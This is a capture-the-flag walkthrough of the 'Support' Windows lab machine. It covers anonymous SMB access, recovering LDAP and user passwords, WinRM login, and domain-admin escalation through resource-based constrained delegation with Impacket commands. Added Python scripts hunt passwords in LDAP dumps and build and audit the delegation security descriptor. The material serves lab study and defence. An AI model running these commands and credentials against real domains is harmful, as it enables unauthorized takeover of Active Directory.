SMB 10.10.11.174 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
┌──(root㉿kali)-[~/Desktop/Support]
└─# smbclient -L 10.10.11.174 -U ""
Password for [WORKGROUP\]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share
┌──(root㉿kali)-[~/Desktop/Support]
└─# smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 21 01:01:06 2022
  ..                                  D        0  Sat May 28 19:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 19:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 19:19:55 2022
  putty.exe                           A  1273576  Sat May 28 19:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 19:19:31 2022
  UserInfo.exe.zip                    A   277499  Thu Jul 21 01:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 19:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe   A 44398000  Sat May 28 19:19:43 2022
The share is readable without a password. UserInfo.exe.zip is the only file not from the May 28 batch; UserInfo.exe is a .NET tool that carries a hard-coded, lightly obfuscated LDAP bind credential, which decodes to:

support\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
The credential binds to the DC (anonymous bind returns nothing useful on a default AD, so bind explicitly):

ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb"
Running UserInfo.exe with Responder answering as the LDAP server shows the binary doing a cleartext simple bind with the same credential, so it is also recoverable on the wire:

[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client   : 192.168.77.131
[LDAP] Cleartext Username : support\ldap
[LDAP] Cleartext Password : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
[Analyze mode: Browser] Datagram Request from IP: 192.168.77.1 hostname: DESKTOP-9GV6IKT via the: File Server to: WORKGROUP. Service: Local Master Browser
ldapdomaindump 'ldap://support.htb' -u 'support.htb\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
Searching the resulting domain_users.json for password-like strings turns one up in the info attribute of the user 'support' (Ironside47pleasure40Watchful), which works for WinRM:
evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb
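The search over domain_users.json above was done by hand. As an added example (not part of the original notes), the script below does the same triage automatically: it walks the dump and flags tokens that look like credentials in the attributes admins tend to abuse for that (description, info, comment and the password attributes). The JSON layout (a list of objects with "dn" and "attributes", values either scalar or list) is my assumption about ldapdomaindump's output, and the three entries are constructed sample data, not the real dump.

```python
"""Flag password-like strings in ldapdomaindump's domain_users.json.

Added example; the input layout (list of {"dn": ..., "attributes": {...}}
with scalar or list values) is assumed, and SAMPLE_ENTRIES is constructed.
"""
import json
import re
import sys

# Attributes where credentials get left behind (the Support box had one in 'info').
SECRET_ATTRS = ("description", "info", "comment", "userPassword", "unixUserPassword")

# Token of 8+ non-space characters containing at least one letter and one digit.
# Crude on purpose: it is a triage filter, and anything it flags still gets tried.
TOKEN_RE = re.compile(r"(?=\S*\d)(?=\S*[A-Za-z])\S{8,}")


def _values(attrs, name):
    """Normalise an attribute to a list (ldap3 emits scalars for single-valued ones)."""
    v = attrs.get(name)
    if v is None:
        return []
    return v if isinstance(v, list) else [v]


def find_password_candidates(entries):
    """Return (sAMAccountName, attribute, token) for every suspicious token."""
    hits = []
    for entry in entries:
        attrs = entry.get("attributes", {})
        sam = (_values(attrs, "sAMAccountName") or ["?"])[0]
        for attr in SECRET_ATTRS:
            for value in _values(attrs, attr):
                if isinstance(value, str):
                    hits.extend((sam, attr, tok) for tok in TOKEN_RE.findall(value))
    return hits


def load_dump(path):
    """Load an ldapdomaindump JSON file (domain_users.json)."""
    with open(path, encoding="utf-8") as f:
        return json.load(f)


# Constructed sample in the assumed layout; the 'support' value is the one from the box.
SAMPLE_ENTRIES = [
    {"dn": "CN=Administrator,CN=Users,DC=support,DC=htb",
     "attributes": {"sAMAccountName": "Administrator",
                    "description": "Built-in account for administering the computer/domain"}},
    {"dn": "CN=support,CN=Users,DC=support,DC=htb",
     "attributes": {"sAMAccountName": "support",
                    "info": "Ironside47pleasure40Watchful"}},
    {"dn": "CN=helpdesk,CN=Users,DC=support,DC=htb",
     "attributes": {"sAMAccountName": ["helpdesk"],
                    "description": ["Temp pw: Summer2022! (rotate me)"]}},
]

if __name__ == "__main__":
    # Usage: python3 hunt.py domain_users.json   (falls back to the sample data)
    entries = load_dump(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ENTRIES
    for sam, attr, tok in find_password_candidates(entries):
        print("%-20s %-12s %s" % (sam, attr, tok))
```

The built-in Administrator description produces no hit (no digits), while the support user's info value and the helpdesk description both do; extend SECRET_ATTRS if the environment stores notes elsewhere.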
Run a BloodHound collection as support. The graph shows support is a member of Shared Support Accounts, and that group has GenericAll over the DC computer object (DC$). That is enough to write msDS-AllowedToActOnBehalfOfOtherIdentity on DC$, i.e. resource-based constrained delegation to an account we control. The other prerequisite is that ms-DS-MachineAccountQuota is above 0 (default 10), so support can create a computer account:
addcomputer.py -computer-name 'evil$' -computer-pass 'password' -dc-ip 10.10.11.174 'support.htb/support:Ironside47pleasure40Watchful'
rbcd.py -delegate-from 'evil$' -delegate-to 'dc$' -action 'write' -dc-ip 10.10.11.174 'support.htb/support:Ironside47pleasure40Watchful'
getST.py -spn 'cifs/DC.support.htb' -impersonate 'Administrator' -dc-ip 10.10.11.174 'support.htb/evil$:password'

getST.py does S4U2self then S4U2proxy as evil$ and saves a service ticket for cifs/DC.support.htb as Administrator. Older Impacket writes it as Administrator.ccache; current releases name it Administrator@cifs_DC.support.htb@SUPPORT.HTB.ccache. Point KRB5CCNAME at whichever file you got and use it with Kerberos auth:

export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py -k -no-pass support.htb/Administrator@DC.support.htb

Two things that break this step: DC.support.htb must resolve to the DC (hosts entry), because the ticket is for that name, and your clock must be within Kerberos skew of the DC (KRB_AP_ERR_SKEW otherwise; sync with ntpdate first).
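What rbcd.py -action write actually puts on DC$ is a binary security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity whose DACL grants evil$ an ACCESS_ALLOWED ACE. As an added example (not from the original notes, and not Impacket's code), the stdlib-only script below builds that blob per MS-DTYP and parses one back, which is also what you want on the defensive side: dump the attribute from every computer object and list who is allowed to delegate to it. The owner/group SID (BUILTIN\Administrators) and the 0x000F01FF mask are what Impacket's rbcd.py uses to my knowledge; the evil$ SID is constructed, the real one is whatever the DC assigns.

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity blob used for RBCD.

Added example, pure stdlib. Layout follows MS-DTYP: self-relative
SECURITY_DESCRIPTOR -> ACL -> ACCESS_ALLOWED_ACE -> SID. SIDs are constructed.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 0x04
ACCESS_ALLOWED_ACE_TYPE = 0x00
RBCD_MASK = 0x000F01FF          # mask Impacket's rbcd.py grants (983551), assumed
BUILTIN_ADMINS = "S-1-5-32-544"  # owner/group of Impacket's empty SD, assumed


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...-1234' -> binary SID: revision, sub-auth count, 48-bit authority (BE), sub-auths (LE)."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("bad SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes, offset: int = 0):
    """Return (sid string, size in bytes) for the binary SID at data[offset:]."""
    revision, count = data[offset], data[offset + 1]
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_sd(delegate_from_sids) -> bytes:
    """Self-relative SD whose DACL lets every listed SID act on behalf of other identities.

    Writing this to a computer's msDS-AllowedToActOnBehalfOfOtherIdentity needs write
    access on that object (GenericAll on DC$ here); that is the 'write' action of rbcd.py.
    """
    aces = b""
    for sid in delegate_from_sids:
        sid_b = sid_to_bytes(sid)
        # ACE_HEADER (type, flags, size) + ACCESS_MASK + trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_MASK) + sid_b
    # ACL header: revision, sbz1, total size, ACE count, sbz2
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(delegate_from_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    off_owner = 20                       # SECURITY_DESCRIPTOR header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # SACL offset 0 = none
    return header + owner + owner + acl


def parse_rbcd_sd(blob: bytes):
    """Return [(sid, mask)] for each ACCESS_ALLOWED ACE: the accounts allowed to delegate here."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            (mask,) = struct.unpack_from("<I", blob, pos + 4)
            sid, _ = bytes_to_sid(blob, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size            # skip unknown ACE types by their declared size
    return allowed


def add_delegator(existing_blob: bytes, new_sid: str) -> bytes:
    """Append our SID without clobbering delegators that are already configured."""
    current = [sid for sid, _ in parse_rbcd_sd(existing_blob)] if existing_blob else []
    if new_sid not in current:
        current.append(new_sid)
    return build_rbcd_sd(current)


if __name__ == "__main__":
    EVIL = "S-1-5-21-1111111111-2222222222-3333333333-1234"   # constructed SID for evil$
    blob = add_delegator(b"", EVIL)
    print(blob.hex())
    print(parse_rbcd_sd(blob))
```

For auditing, feed parse_rbcd_sd the raw attribute from an LDAP search over every computer object (the value is returned as bytes) and flag any SID that is not an expected front-end service account; a freshly created machine account showing up there is exactly the trace this attack leaves.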